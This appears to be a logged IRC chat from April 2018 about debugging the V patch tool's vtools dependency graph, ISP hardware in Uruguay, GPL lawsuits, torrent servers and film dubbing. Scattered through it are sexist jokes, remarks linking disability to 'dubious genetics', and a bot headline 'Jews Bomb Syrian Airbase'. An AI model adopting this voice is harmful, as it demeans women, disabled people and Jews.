1794558;1523256125;mircea_popescu;ckang BingoBoingo is in uruguay building the pizarro.isp ; see pizarroisp.net and you know, 1794559;1523256129;mircea_popescu;!#s "pizarro" 1794560;1523256129;a111;124 results for "\"pizarro\"", http://btcbase.org/log-search?q=%22pizarro%22 1794561;1523256156;ckang;I have a few old supermicro 2u's 1794562;1523256173;ckang;once it is up will you all be selling rackspace ? 1794563;1523256314;ckang;I wanted some offsite / bulletproof storage, I am moving entirely off the 'cloud' 1794564;1523256559;ckang;I have an odd fetish for collecting NDA code/documents 1794565;1523257077;mircea_popescu;well, talk to ben_vulpes ; not enough machines yet, but yes, more being shipped 1794566;1523257175;ckang;i have machines, just need ping/power/pipe 1794567;1523257200;ckang;and a place that doesn't care about DMCA 1794568;1523257233;mircea_popescu;ah, that may work out. talk to ben_vulpes when he wakes. 1794569;1523257238;ckang;broadcom lawyers ^.^ 1794570;1523257240;mircea_popescu;though getting gear into paraguay is a little finnicky. 1794571;1523257306;ckang;import duties ? or shady customs officers ? 1794572;1523257557;mircea_popescu;read the log, they had a whole thing recently with like 100kgs worth of various shit. 1794573;1523280617;shinohai;http://btcbase.org/log/2018-04-09#1794417 <<< read through last night's log, and got same behaviour (unsurprisingly) ... used own personal copy of mod6's V and tested with one from foundation as well, equal results. 1794574;1523280617;a111;Logged on 2018-04-09 04:25 hanbot: phf et al: attempted to press latest vtools to the keccak head. v (mod6's) reports vtools_vpatch_newline not in flow, neither its antecedent vtools_fixes_static_tohex, despite both patches and (verified good) sigs present (they neither show up via flow command). v will press to vtools_vpatch.vpatch, but no further. see http://p.bvulpes.com/pastes/oNRhE/?raw=true . 1794575;1523280657;shinohai;Will be happy to serve as extra set of eyes if you want to dig further mod6 1794576;1523282032;asciilifeform;mod6: http://btcbase.org/log/2018-04-09#1794439 >> i got totally different result, using your v.pl : http://p.bvulpes.com/pastes/EixkY/?raw=true 1794577;1523282032;a111;Logged on 2018-04-09 05:04 mod6: 3) Check the flow, see that vtools_fixes_static_tohex.vpatch is not in the flow, and check to ensure that the seal verifies, and it dows 1794578;1523282126;asciilifeform;mod6: my old v99, however, gives eggog: http://p.bvulpes.com/pastes/5hA4U/?raw=true 1794579;1523282149;asciilifeform;( it does this for ben_vulpes's most recent key also. i still do not know why. ) 1794580;1523282216;phf;http://btcbase.org/log/2018-04-09#1794530 << you can see two lines going into vtools_fixes_static_tohex, one from vdiff_fixes_newline_gcc and another from vdiff_sha_fixes_newline_gcc. they are both from 98BA and either should satisfy the requirement. the other two lines in are from vtools_vpatch only for 7EBF and 02A0. 1794581;1523282216;a111;Logged on 2018-04-09 06:34 mircea_popescu: that's the fucking problem! the vtools_fixes_static_tohex uses xalloc.h 98BA when it should instead use its own line (earlier) version of C89B. 1794582;1523282348;phf;antecedent graph != requirement graph 1794583;1523283059;mod6;I have no fucking idea what is going on. alf - that's really weird. im using the following patches/seals, and I'm getting this: http://p.bvulpes.com/pastes/RrM1h/?raw=true 1794584;1523283109;mod6;I don't have time to debug this shit now. but at some point I'll have to actually look at this project and try to figure out what the graph is ~supposed~ to look like and why my V chokes on it. 1794585;1523283140;mod6;Someone needs to write and maintain a proper V for the republic. 1794586;1523283147;mod6;It sucks up way to much of my time. 1794587;1523283398;asciilifeform;mod6: it probably does not help that one has to hand-click 22 times to download this set. possibly you missed one? 1794588;1523283442;mod6;I'm hoping that phf will look at my latest link and audit that for me. I've pulled everything from : http://barksinthewind.com/2018/vtools-keccak-regrind/ 1794589;1523283449;mod6;I could have missed one, indeed. 1794590;1523283530;phf;mod6: all are there 1794591;1523283537;mod6;yeah, im not sure wtf. 1794592;1523283538;asciilifeform;hmm looks like it 1794593;1523283556;mod6;there is a reason that those two vpatches are being thrown out. 1794594;1523283572;mod6;i need to do a deep debugging session to figure out the root cause. 1794595;1523283577;mod6;no time now. 1794596;1523283592;mircea_popescu;omg i just pointed out the cause : he links the wrong version of xalloc 1794597;1523283610;phf;mircea_popescu: did you see my response 1794598;1523283638;mircea_popescu;http://btcbase.org/log/2018-04-09#1794582 ? 1794599;1523283638;a111;Logged on 2018-04-09 13:59 phf: antecedent graph != requirement graph 1794600;1523283648;phf;the one before that 1794601;1523283662;mod6;I suspect that is the problem with the rules. 1794602;1523283671;mircea_popescu;phf i looked at the patch itself. 1794603;1523283688;mod6;Before we said "all antecedents must be present for a descendant to be in the flow". 1794604;1523283688;mircea_popescu;lemme reload all this pile of stuff here, i closed it all last night. 1794605;1523283740;mod6;So made routines that do just that. There almost certainly is not a built in case where two antecedents have the same output hashes and can use a single in that csae. 1794606;1523283760;mod6;If you understand my meaning. I.e. I would need to add an exception to the rule for that. 1794607;1523284057;mod6;asciilifeform: out of curiosity, what version of my V are you using? 1794608;1523284072;mircea_popescu;well now i can't fucking reproduce it at all. 1794609;1523284075;BingoBoingo; textile engineering !? << You know... Applied HAIR THEORY! 1794610;1523284119;mircea_popescu;phf what is the vdiff_sha_fixes_newline_gcc link to vtools_fixes_static_tohex ? as now apparently the two patches are entirely disjunct, did you update or something ? 1794611;1523284194;phf;mircea_popescu: that's one of the 98BA's 1794612;1523284250;phf;http://btcbase.org/hash/98BA7212FAFA4A61F6D6096F1A2953A67A70FCF185965ED7199A223F6897C9B9F2996D391A3F363282236889413973D0BEADA0E36D57068549BEA672FD110D8D you can see here who produces it and who consumes it 1794613;1523284260;mircea_popescu;a right. hanbot do me a favour : download ~only~ those patches which are in the leftmost trunk seen on phf's viewer (so exclude vtools_vdiff_sha, and its dependents) and try to flow again ? 1794614;1523284328;mircea_popescu;mod6 i suspect we ran into a novel situation : if there's ambiguous file usage in multi-head bundles, v panics. 1794615;1523284402;mircea_popescu;(which is not even wrong, as the serial application of patches from different branches can result in a messed up codebase ; but it could be more verbose about what happened) 1794616;1523284470;mod6;yeah, totally. 1794617;1523284514;mod6;alf already instructed me a number of months ago to be more verbose about failures. I didn't get that done as much on the last release as I was trying to limit the scope to the last change for the press-paths. 1794618;1523284546;mod6;So indeed, better failure messages are needed. And if we're going to allow this type of strange project structures, that'll have to get built into the rules. 1794619;1523284556;mircea_popescu;it's not directly clear just ~how~ it could be more verbose here, seeing how it doesn't magically know all the "meanings" we associate to the patches themselves. 1794620;1523284573;hanbot;mircea_popescu: on it 1794621;1523284612;mod6;mircea_popescu: well, for instance, it would be nice if I'd have put a statement in the release version that yells when it throws a vpatch out for rule breakage. 1794622;1523284645;mircea_popescu;wouldn't have gained us anything here, it'd just have pointed to vtools_fixes_static_tohex, but we pretty much knew that one is where it dies anyway. 1794623;1523284652;mod6;in this case, it throws out: vdiff_sha_static.vpatch and vtools_fixes_static_tohex.vpatch 1794624;1523284667;mod6;yeah, this is true too. 1794625;1523284711;mod6;mircea_popescu: i can try the leftmost trunck on phf's viewer, but not right this minute. maybe in a few hours. i'm pinned down in the mud. gotta kill the guy in the pillbox first. 1794626;1523284741;mircea_popescu;no, what it should do is yell "alternate paths to press $vtools_fixes_static_tohex.vpatch requirement $x.alloc : $vtools+patch and $vdiff_sha_fixes_newline_gcc." 1794627;1523284761;asciilifeform;http://btcbase.org/log/2018-04-09#1794607 << apparently : 99995 1794628;1523284761;a111;Logged on 2018-04-09 14:27 mod6: asciilifeform: out of curiosity, what version of my V are you using? 1794629;1523284784;mod6;asciilifeform: ahhhh interesting, thanks for reporting. 1794630;1523284799;hanbot;mircea_popescu flow thusly shows genesis only: http://p.bvulpes.com/pastes/VVZTX/?raw=true 1794631;1523284805;mod6;mircea_popescu: solid plan. i can add something like that perhaps when alternate paths are detected. 1794632;1523284808;mircea_popescu;which is a useful warning, because in principle if $1 and $2 could both delivered wanted $file, but the author intended for $1 to be used, $2 might produce different $otherfile than author needed, and then you can't press because your hashes no longer match downstream" 1794633;1523284857;mircea_popescu;hanbot you're missing one. 1794634;1523284872;mircea_popescu;vdiff_fixes_newline_gcc 1794635;1523284910;hanbot;pff sorry. 1794636;1523285031;hanbot;right, correct patchset on the left then presses + flows to vtools_vpatch_newline 1794637;1523285041;mircea_popescu;aha! 1794638;1523285043;phf;fwiw there's no ambiguity in the patchset, the dependency graph _is constrained_. but you can't make that constraint rule based, you can e.g. discover that constraint by walking the graph while keeping the track of the checksums of the press (i suspect there's a smarter graph theoretical way of doing it, but a "press walk" is the easiest). 1794639;1523285066;phf;obviously that works because btcbase produces the correct dependency graph 1794640;1523285097;mircea_popescu;yeah. so on one hand indeed the problem was as suspected ; but on the other hand phf is correct and yes the graph IS constrained. 1794641;1523285123;mircea_popescu;phf i guess next on your plate is make a prototype proper grapher for all time ? then mod6 can put that in v and avoid further such wtfs. 1794642;1523285686;mircea_popescu;the easiest press walk may in principle become very VERY expensive on large enough projects (in terms of the bitcoin blockchain large, 6 digit patches with 1-3 digit files included each it'd be a true unassailable nightmare). but then again it also bakes in some incentive to NOT DO THAT. 1794643;1523285720;phf;i suppose that's one way to release btcbase source: slowly rewrite it all in ada 1794644;1523285735;mircea_popescu;know a better one ? 1794645;1523285770;mircea_popescu;need-driven rewrite, best engineering known to man. it's certainly how i produce trilema. 1794646;1523285882;asciilifeform;'large enough projects' are bug 1794647;1523285950;mircea_popescu;asciilifeform i am in horrified awe of the recent realisation that http://btcbase.org/log/2018-04-07#1793799 1794648;1523285950;a111;Logged on 2018-04-07 01:25 mircea_popescu: 6mb to get a fucking blog cms going. oh epic world of bits... 1794649;1523285970;mircea_popescu;165 thousand lines! hundreds upon hundreds of files. IT DOES PRETTY MUCH NOTHING! 1794650;1523285972;asciilifeform;but not horrified at a half-MB 'diff', lol 1794651;1523285990;mircea_popescu;well the genesis is multi-mb isn't it. 1794652;1523286005;asciilifeform;aha 1794653;1523286010;mircea_popescu;that's what i mean. 1794654;1523286060;asciilifeform;( speaking of entomological horror, today found https://archive.li/Efx3S in the glue trap : one of those chinese shannonized btc-flavoured liquishit items, but this time claiming to be a trilema article ! ) 1794655;1523286079;mircea_popescu;but the devil is in the details. consider how this flows : "so mp, do you want a gui ?" "uh ok" "should it have any buttons on it ?" "kinda what a gui is" "every button will have to be specified, as to location, as to..." "just get on with it" "6mb, will that be cash or check on other people's time ?" "motherfucker..." 1794656;1523286101;asciilifeform;'where, sir, wouldja like this put !' 1794657;1523286139;mircea_popescu;asciilifeform there's lots of mfa using my name / stuff. apparently i'm a valuable google adwords item. 1794658;1523286181;mircea_popescu;anyway, this PARTICULAR item is a chinese forum that actually tracks us / includes (not terrible) translations of trilema pieces for commentary etc. 1794659;1523286462;mircea_popescu;(the great win being 注:爱比特.聂意译,翻译的不一定准确,也可能理解的完全相反,欢迎高手指教。~aka attention: my translation is not necessarily accurate, trilema may very well mean the exact opposite. such is the world of experts.) 1794660;1523286755;*;asciilifeform not currently equipped to distinguish these from the usual shannonolade , sadly 1794661;1523286976;mircea_popescu;in other sads : "can install following OS for you: Centos 6 and 7; Debian, 6, 7 and 8; Ubuntu 14.04 and 16.04; Ubuntu Desktop; Esxi 5.5 and 6.5; Windows 7 Pro and 10 Pro (trial versions); Windows Server 2008, 2012 and 2016; or we can provide your KVM or IPMI access and you can install your own custom OS like Gentoo e,t,c" 1794662;1523286995;mircea_popescu;soo trinque, can i hire you to install your blessed gentoo in there ? 1794663;1523287152;trinque;wont be the vtronic portage just yet, but yeah, I can install an entirely usable gentoo for ya. 1794664;1523287154;trinque;where's this? 1794665;1523287179;*;mircea_popescu is commissioning a new server with a 1gbps unmetered port to act as a torrent client, because i've finally decided i wish to keep copies of all the films i review. 1794666;1523287194;mircea_popescu;ben_vulpes : is this a contract you folks want, incidentally ? 1794667;1523287246;douchebag;trinque: One of the girls is wondering when the transactions from last night will go through 1794668;1523287494;trinque;get to them both in a bit. doing some surgery. 1794669;1523287506;trinque;typically I run them in 24hrs or fewer. 1794670;1523287530;douchebag;That's what I told them, but you know how women are 1794671;1523287544;mircea_popescu;the good news for you mod6 being that you don't really have to do anything ; v.pl is fine as it is, for now, and once phf has a prototype walker you can just move on to that and it'll be cheaper. continue work on your ada guy in the meanwhile at your leisure, seems we're converging that way. 1794672;1523287560;mircea_popescu;douchebag he doesn't know how women are. 1794673;1523287566;mircea_popescu;he's from texas, they don't have them there. 1794674;1523287582;douchebag;He doesn't have any cousins? 1794675;1523287584;douchebag;Haha 1794676;1523287585;trinque;I was gonna say "make you pie, agreeable, what" 1794677;1523287592;trinque;dunno what to grasp foar here 1794678;1523287656;mircea_popescu;and in today's funny spanish lesson : pie, in spanish, means foot. this, of course, does not prevent the uppity coffee house i favour from being all international and offering pie de manzana. 1794679;1523287666;mircea_popescu;i've been eating lots and lots of apple feet. 1794680;1523287694;douchebag;Apple feet? Fuck yeah 1794681;1523287697;trinque;lol 1794682;1523287753;mircea_popescu;yup. with icecream between the toes 1794683;1523287755;mircea_popescu;"a la mode" 1794684;1523287762;trinque;girlfriend's pop is from east texas, where the coon-ass leaks over from louisiana. any time he cooks something tasty, it's "I put my foot in that!" 1794685;1523287777;trinque;guy makes good stuff, so I never questioned his technique 1794686;1523287798;douchebag;Your dad? 1794687;1523287813;douchebag;Lol, just fucking w/ you 1794688;1523287862;douchebag;Honestly, Texas seems like a pretty nice place to live 1794689;1523288001;mircea_popescu;incidentally, anyone looked into the guts of vmware's esx (now "esxi") see how exactly it does the hardware driving (ie which bsd it lifted from) ? 1794690;1523288033;asciilifeform;mircea_popescu: their src iirc leaked in 2012 1794691;1523288037;mircea_popescu;aha. 1794692;1523288048;asciilifeform;there's a number of variously-working clones nao, e.g. 'virtualbox' 1794693;1523288080;mircea_popescu;just thought it a pretty lulzy item. 1794694;1523288112;asciilifeform;and the only iron trickery in virtualizers is re: the amd64( and intel's clone ) vmization extensions 1794695;1523288130;asciilifeform;which are ~100% documented in amd's datashits 1794696;1523288173;asciilifeform;(y'know, the thing that swaps registers in and out, traps i/o for simulating disk/nic, etc) 1794697;1523288527;mircea_popescu;asciilifeform there was also that hellvig lawsuit (which afaik went exactly the same place all other "rule of law" challenges to notes-from-stalin ever went) 1794698;1523288544;mircea_popescu;speaking of yest's http://btcbase.org/log/2018-04-06#1793721 1794699;1523288544;a111;Logged on 2018-04-06 20:58 asciilifeform: mircea_popescu: it is not even clear to me that eben moglen (note, not rms) gpl experiment , i.e. 'use copyrasty against itself', worked for a short while ( to naked eye it would seem that it did, bsd routines got subsumed into microshit, gnu -- not , but there ~are~ alternative plausible explanations that don't involve 'fear of gpl violation' ) 1794700;1523288570;asciilifeform;what even was this, i missed it 1794701;1523288609;mircea_popescu;they lifted most of the linux kernel (the expensiuve parts, anyway. then https://sfconservancy.org/news/2015/mar/05/vmware-lawsuit/ 1794702;1523288631;asciilifeform;aa yea there's 9000 of these. all evaporated. 1794703;1523288653;mircea_popescu;no because germany is not a handpuppet. it has like, courts and shit. respek the sovereign cumrag! 1794704;1523288653;asciilifeform;( various router makers, internet-of-shit vendors, etc. all piss on gpl, with impunity ) 1794705;1523288669;asciilifeform;lol 1794706;1523288770;asciilifeform;the ways these typically end : a) (most common) simply evaporates, no record of wtf happened to the case b) violator supposedly kowtows, 'complies' -- which 100% of the time in practice consists of putting up a tarball ~with the lifted orig turd~, none of the 'viral' provisions of gpl are given any attention at all , but hilariously the plaintiff ~eats this~ 1794707;1523288777;asciilifeform;and 'declares victory for gpl' naturally. 1794708;1523288807;asciilifeform;'и волки сыты и овцы целы'(tm) 1794709;1523288815;mircea_popescu;the motivations are transparently unprincipled. i mean -- they published "support" at the bottom, which 100% consists of cheap linkbait by assholes a la "pump.io" and so forth. support my foot. 1794710;1523288821;asciilifeform;( how does that even go in engl. ? ) 1794711;1523288827;mircea_popescu;it's all an exercise in paper-over, and their only incentive is to claim surface. 1794712;1523288926;mircea_popescu;asciilifeform i dunno, something about how "my delicious cake is in the fridge" 1794713;1523289002;asciilifeform;( orig . 'the wolves are fed, but the sheep are whole' , i.e. all parties walk away content ) 1794714;1523289052;mircea_popescu;speaking of which, ckang do you have a pump.io account ? 1794715;1523289062;asciilifeform;example of typical 100%-certifiably-worthless gpl compliance -- google's 'chromebook' www 1794716;1523289077;asciilifeform;^ and for that matter ~every 'we sell linux-based machine' vendor on the fucking planet 1794717;1523289095;ckang;I dont, never heard of it, looking now 1794718;1523289100;asciilifeform;'here you can have a stock kernel tarball' 'here have a stock gcc' 'but can i rebuild the contents of $box?' '...' 1794719;1523289101;mircea_popescu;how about mastodon ? 1794720;1523289125;mircea_popescu;asciilifeform myeah. 1794721;1523289243;mircea_popescu;https://www.wired.com/story/decentralized-social-networks-sound-great-too-bad-theyll-never-work/ << i take this as a pretty reliable counter-signal. after all it's in fucking wired. 1794722;1523289360;asciilifeform;mircea_popescu: at one point i wanted to run the client for 1 of these ( i forget which, maybe 'mastodon' ) and barfed : GB of ruby 1794723;1523289388;mircea_popescu;(this is whart you get if you permit chelsea barabas and other knitters into "tech" : inept articles about how "my ass is really really fat and the couch is really really comfortable".) 1794724;1523289395;mircea_popescu;asciilifeform so let him do it, what. 1794725;1523289422;asciilifeform;aa it wasn't a 'noo, dun do it!11', but a 'i tried, never got even helloworld' 1794726;1523289437;mircea_popescu;not a good fit for your strengths :D 1794727;1523289447;asciilifeform;these opensores folx seem to exist to make ye olde microshit look compact, bug-free, runnable 1794728;1523289491;asciilifeform;funnily enuff ~nobody alive knows how to actually build a ruby interpreter from src 1794729;1523289512;*;asciilifeform spoke with several folx who make a living in it, they all 'wtf go download prebuilt vm' 1794730;1523289526;mircea_popescu;it's a means of expression, you udnerstand this ? emo mostly died because it was evidently pointless, to the poor misunderstood darlings themselves, "all this '''poetry''' that does nothing, not even rhyme." 1794731;1523289536;mircea_popescu;so they came up with the emo spew of the next decade : github contributions! 1794732;1523289556;mircea_popescu;it's just as nonsensical, pointless and useless. but it meets much better standards of self-expression as subjectively perceived. 1794733;1523289564;mircea_popescu;there's millions of eyes on it, don't you know ?! 1794734;1523289577;asciilifeform;nuffing new under the sun : obscurantist claptrap with 'arcane tech' flavouring was hip in 16th c ! consider the court alchemists. 1794735;1523289581;mircea_popescu;(fun fact : installing security cameras increases the chances of sex act occuring in the space like 30x) 1794736;1523289608;mircea_popescu;("oh mp, that's racis, it just went unreported before" "your mother went unreported.") 1794737;1523289677;asciilifeform;'Tick off Facebook and you may be unable to work, date, or listen to music.' << lolwaat 1794738;1523289697;mircea_popescu;the funny thing is the cocksuckers aren't even PAID for the fluff pieces. 1794739;1523289704;mircea_popescu;it's just what they do, born fluffers. 1794740;1523289759;mircea_popescu;phf ben_vulpes Framedragger any one of you want to add a gopher service to teh logotron ? 1794741;1523289802;phf;lulz 1794742;1523289811;mircea_popescu;lobbes ^ 1794743;1523289818;mircea_popescu;phf exactly! 1794744;1523289822;phf;fwiw i have it, i'll put mine online in the next day or two 1794745;1523289827;mircea_popescu;works. 1794746;1523289855;mircea_popescu;all these fucktards, you know. oh, "smashing success". dude, it's an off the cuff item gets done if it even needs any doing over a weekend. 1794747;1523289868;mircea_popescu;"technology we've been working at for five years" "because you're retarded, and your tooling sucks" 1794748;1523289980;phf;http://btcbase.org/log/2018-04-09#1794728 << man sometimes you just say stuff. 1794749;1523289980;a111;Logged on 2018-04-09 15:58 asciilifeform: funnily enuff ~nobody alive knows how to actually build a ruby interpreter from src 1794750;1523289994;mircea_popescu;i was waiting for that. 1794751;1523290001;asciilifeform;phf: i looked in my notes, this was mistake : story concerned actually 'rails', a library for same 1794752;1523290004;asciilifeform;rather than ruby per se 1794753;1523290018;*;asciilifeform was waiting for somebody to 'i was waiting for that' 1794754;1523290050;mircea_popescu;orly! 1794755;1523290434;asciilifeform;'... But managing public keys is hard for most users ... The reality is that most people do not want to run their own web servers or social network nodes. They want to engage with the web through friendlier platforms' << sop prikokeism , snoar 1794756;1523290932;mircea_popescu;let's preserve http://wiki.c2.com/?StupidPetTricks here, because it's as fine example of the http://btcbase.org/log/2016-12-27#1591184 "euler quaternions" idiotic bullshit. 1794757;1523290932;a111;Logged on 2016-12-27 18:18 mircea_popescu: oh, hey, I KNEW this was gonna be in there. a) "I recommend using quaternion variables to represent two things: an object's rotation, and/or a rotation which you'd like to apply to some object." ; b) "You cannot represent rotations of greater than 180 degrees with Quaternions, and when doing a Slerp() or MoveTowards() rotation with Quaternions, the rotation always take the shortest path. So if you need to rotate more than 180 1794758;1523291067;mircea_popescu;imo definitive explanation of why rubylang rots brain and you're better off learning perl before you start doing 5.days.ago.days.days.ago 1794759;1523291126;ben_vulpes;http://logs.bvulpes.com/trilema?d=2018-4-9#328859 << sadly don't actually have the hardware or pipe for this atm 1794760;1523291134;mimisbrunnr;Logged on 2018-04-09 15:10 mircea_popescu: ben_vulpes : is this a contract you folks want, incidentally ? 1794761;1523291134;asciilifeform;as i understand this even is brainrot from 10y ago; present-day rubyists do not even see the x.y.ago.ago.ago , but 'program' in 'libraries' written by same ( or perhaps even by a generation of 2 of 'programmers in libraries' ) 1794762;1523291168;mircea_popescu;yawell. 1794763;1523291182;mircea_popescu;you can't paper over brainrot. 1794764;1523291191;asciilifeform;quite the opposite, in fact 1794765;1523291201;mircea_popescu;if dentists were programmers they wouldn't have any need for drills, just cement over cavities and then cement over that. 1794766;1523291225;asciilifeform;^ this is what american dentists do much of the time 1794767;1523291229;mircea_popescu;purple screen of tooth pain 1794768;1523291319;mircea_popescu;asciilifeform not just usian disease anymore. i had some work done recently, very pretty girl, quite competent (sadly, being a good dentist requires the steady hand only a properly developed brain can produce. retards can't ever be sharpshooters, dentists, surgeons etc because dubious genetics -> dubios fenotype -> too ungaitly assymetric to perform) 1794769;1523291351;mircea_popescu;anyway, and she wanted to put me under! and i was naw, go ahead. took some convincing, and by the time she was halfway through she was sweating profusely and had the shakes. "but doesn't it hurt ?!?!" 1794770;1523291389;mircea_popescu;"well... apparently it hurts you ? i've seen women go through gangbangs with less extrapyramidal effects" 1794771;1523291394;asciilifeform;my local drmengele is, believe or not, the opposite : 'you dun need it' -- proceeds to drill without painkiller. asciilifeform -- used it it by nao 1794772;1523291399;asciilifeform;*used to 1794773;1523291426;mircea_popescu;good. 1794774;1523291438;mircea_popescu;one day when you really need it -- it'll work for you. 1794775;1523291445;asciilifeform;was exactly asciilifeform's thought 1794776;1523291460;mircea_popescu;al schwartz's "believe it or not ketamine dun work" has a lot to do with "well... you've been to the dentist all these many years ?" 1794777;1523291762;mircea_popescu;ben_vulpes it's a low spec computer (mostly, two huge disks, otherwiuse modest) ; but anyway, something to grow into. 1794778;1523291796;asciilifeform;ben_vulpes: if you want to include a mechanical hdd or 2 in the cargo, it is not too late 1794779;1523291814;asciilifeform;we dun have 1G/s yet, tho. 1794780;1523291837;mircea_popescu;asciilifeform bonus, whole thing costs me <.1 1794781;1523291845;ben_vulpes;asciilifeform: do you have mechanicals in stock? needs procuring? 1794782;1523291868;asciilifeform;ben_vulpes: i can procure, if you say which; but gotta have concrete plan . 1794783;1523291957;ben_vulpes;asciilifeform: please to spec it out, yr the hardware guy. would this get attached to one of the rockchips? 1794784;1523291958;asciilifeform;btw folx, today is absolute last day for 'i want $custom-iron' 1794785;1523291977;mircea_popescu;holy shit they're expensive now. i just bought a 4tb toshiba for ~100 bux locally ; seems item is like 120 or so online ? 1794786;1523291984;phf;don't need fat pipe to torrent for backups, will just take long time. my torrent box is on a very thin line, and i just set the upload/download max clients seed ratio etc. appropriately 1794787;1523292014;mircea_popescu;phf suppose tomorrow you decide you want to see $item you read on trilema. should it take you a week ? 1794788;1523292025;asciilifeform;mircea_popescu: 113bux on lolazon 1794789;1523292038;phf;mircea_popescu: it has been 1794790;1523292039;mircea_popescu;it blows my mind i got a discount for being in latinoland. 1794791;1523292047;mircea_popescu;phf so now it will be streaming speed. 1794792;1523292116;ben_vulpes;asciilifeform: and what machine to hook it to? 1794793;1523292143;asciilifeform;ben_vulpes: this was a q for ben_vulpes , who has seen what's in the rack and knows if any empty holes 1794794;1523292189;phf;(but also this is a thin pipe for 2-9gb customary torrent sizes, i know mircea_popescu is partial to 750mb prints) 1794795;1523292194;lobbes;Added to my hopper >> http://btcbase.org/log/2018-04-09#1794742 1794796;1523292194;a111;Logged on 2018-04-09 16:03 mircea_popescu: lobbes ^ 1794797;1523292211;mircea_popescu;phf do you genuinely see a problem with cd-size movies ? 1794798;1523292230;mircea_popescu;because i also intend to re-encode everything. 1794799;1523292256;mircea_popescu;lobbes you added gopher to your hopper ?! what did grace say ? 1794800;1523292301;lobbes;Lol 1794801;1523292363;ben_vulpes;asciilifeform: all of the machines in the rack are being used; i was asking if one of the rockchips can handle this kind of duty. 1794802;1523292367;phf;mircea_popescu: well, sometimes quality does suck, when you do e.g. a wall projection. those 9gb prints are usually done by obsessive people. but main reason is that i'm pulling from slav sources, where 800mb version is slav audio track only. "original audio track" is a bonus on those "archival" prints 1794803;1523292376;mircea_popescu;ben_vulpes mechanical poor fit for rockchip. 1794804;1523292395;asciilifeform;ben_vulpes: rockchip can drive a single usb3 disk, with appropriate cable. 1794805;1523292398;mircea_popescu;phf i can't fucking STAND dubs. 1794806;1523292447;mircea_popescu;kinda why i have 0 interest in teh ruworld torrents, nfi who told these folks it's ok to hire some tolomak to do say richard burton. wtf. 1794807;1523292506;ben_vulpes;asciilifeform: i don't think we have a machine that is even free for this purpose; and so don't understand why we'd ship hdds down without a machine to put 'em in, although i could be being thick and not seeing something 1794808;1523292531;asciilifeform;btw i oughta say a word re how rockchiptron reproduces. i wrote a bit of script, ./breed_boot.sh /dev/sd_whatever_cardreader_with_card_in_it -- produces copy of the boot card ; ./breed_root.sh /dev/large_enuff_disk copies the root partition contents onto a new part on said disk 1794809;1523292532;phf;well, i download the 9gb versions, and have a script that keeps only one specific audio track. the whole thing is a semi manual process though, since i have to select the right track by ear, etc. 1794810;1523292538;asciilifeform;and thus the box can breed copies of self 1794811;1523292552;phf;i don't at present recode them because space is cheap 1794812;1523292605;phf;but yeah dub world is funny. heated debates over whether translation by say borodinsky or kozlov are better 1794813;1523292665;mircea_popescu;curl http://trilema.com/category/trilematograf/ | wc -l > 481 1794814;1523292676;mircea_popescu;481 * 9 = 4329, ie more than the hd i bought. not cheap. 1794815;1523292718;mircea_popescu;phf the notion that you'll have a local capable of the delivery of any arbitrary actor... really ? kozlov gonna sound like marylin ? slim ? etcetera ? 1794816;1523292720;mircea_popescu;scandal! 1794817;1523292803;asciilifeform;mircea_popescu: traditional ru dub is either 1 voice, or ('classy!') 2, male/female 1794818;1523292809;asciilifeform;so, even worse. 1794819;1523292856;mircea_popescu;no, i know. terrible orcism. 1794820;1523292868;mircea_popescu;what, russkis can't read subtitles like sane fucking people ? 1794821;1523292903;asciilifeform;i suspect there's su-era nostalgia keeping the thing alive. sorta how in jp old farts are ~100% of whale meat market, because mcarthur fed it to'em back in the day 1794822;1523292920;asciilifeform;su underground film translators simply had no access to subbing gear 1794823;1523292922;mircea_popescu;i guess. it's not even that good! 1794824;1523292926;asciilifeform;aha, is the point 1794825;1523292969;mircea_popescu;phf what are you using btw ? i'm thinking deluge, apparently has a web interface can just get the girlies set up with. 1794826;1523293166;phf;aria2, i think it has a web interface even, but the whole thing is entirely automatic. cron to hoover up torrents from ~/Downloads, ssh them into a box folder, sleep based script picks it up on other end, feeds it to aria, when finished downloading writes it to an rss and also to a directory that's expose through apache 1794827;1523293188;mircea_popescu;asciilifeform incidentally, here's an idea : think sokoban, but extended so that 1. there's enemies, which can kill you, and 2. you can actually shoot projectiles at them. take advantage of diagonal/straight piercing/exploding and of course destroyable/nondestroyable movable/non movable environment. 1794828;1523293194;mircea_popescu;phf i intend to use the box as the center. 1794829;1523293211;asciilifeform;mircea_popescu: 'supaplex', msdos 1794830;1523293220;mircea_popescu;asciilifeform nah, there's no firing. 1794831;1523293227;asciilifeform;hmm. 1794832;1523293236;mircea_popescu;but the bonus gravity is a good idea. 1794833;1523293256;mircea_popescu;this'd be like... the definitive platformer. 1794834;1523293271;asciilifeform;verily 1794835;1523293281;mircea_popescu;also, sokoban is an achieve-structure game ; supaplex more of a reach-x 1794836;1523293282;phf;deluge looks workable, but i've never used it. i used https://transmissionbt.com/ but not their web interface 1794837;1523293305;mircea_popescu;phf the spec here is "have a library of good films accessible to friends" rather than "i want to watch something between blowjobs" 1794838;1523293361;mircea_popescu;asciilifeform "move that crate to the left, but NOT YET or else that weird plant shoots you as it's exactly diagonal" 1794839;1523293422;mircea_popescu;PLUS you get for the first time now the best thing ever : your guy can a) learn (say, spells) and b) equip, items. because there's meaningful effects to have. 1794840;1523293449;mircea_popescu;ima fucking spec this. 1794841;1523293758;trinque;rtorrent's pretty good for "run as service" 1794842;1523293870;ben_vulpes;the transmission web interface is fine 1794843;1523294113;mircea_popescu;it turns on i'm not the first one to have done this then ?! 1794844;1523296214;deedbot;http://qntra.net/2018/04/jews-bomb-syrian-airbase/ << Qntra - Jews Bomb Syrian Airbase 1794845;1523299578;phf;http://btcbase.org/log/2018-03-26#1789663 << actually i'm not experiencing the same in the dc area, i wonder if tmobile has some sort of 3g wind down thing going 1794846;1523299578;a111;Logged on 2018-03-26 07:31 phf: http://btcbase.org/log/2018-03-19#1788278 << i've discovered similar, my 3g phone barely has signal and doesn't last more than a day in san francisco. presumably because the number of 3g supporting towers is significantly lower here 1794847;1523299591;phf;s/not experiencing/now experiencing/ 1794848;1523299609;asciilifeform;phf: supposedly tmobile keeping 2g alive for another 2y 1794849;1523299629;asciilifeform;( afaik no plans to abolish 3g ) 1794850;1523299662;phf;i wonder if it's the phone itself though, but i fail to see how the reception quality would degrade :o 1794851;1523299706;asciilifeform;in city, your connection depends ~100% on the particular tower you're standing ~next to 1794852;1523301177;mircea_popescu;maybe it's all those republican fake towers. 1794853;1523301470;asciilifeform;opposite, those make for great reception where there ought have been none 1794854;1523302178;mircea_popescu;right. 1794855;1523303520;deedbot;http://trilema.com/2018/boboban/ << Trilema - Boboban 1794856;1523303818;mircea_popescu;^ anyone wanna work on that ? 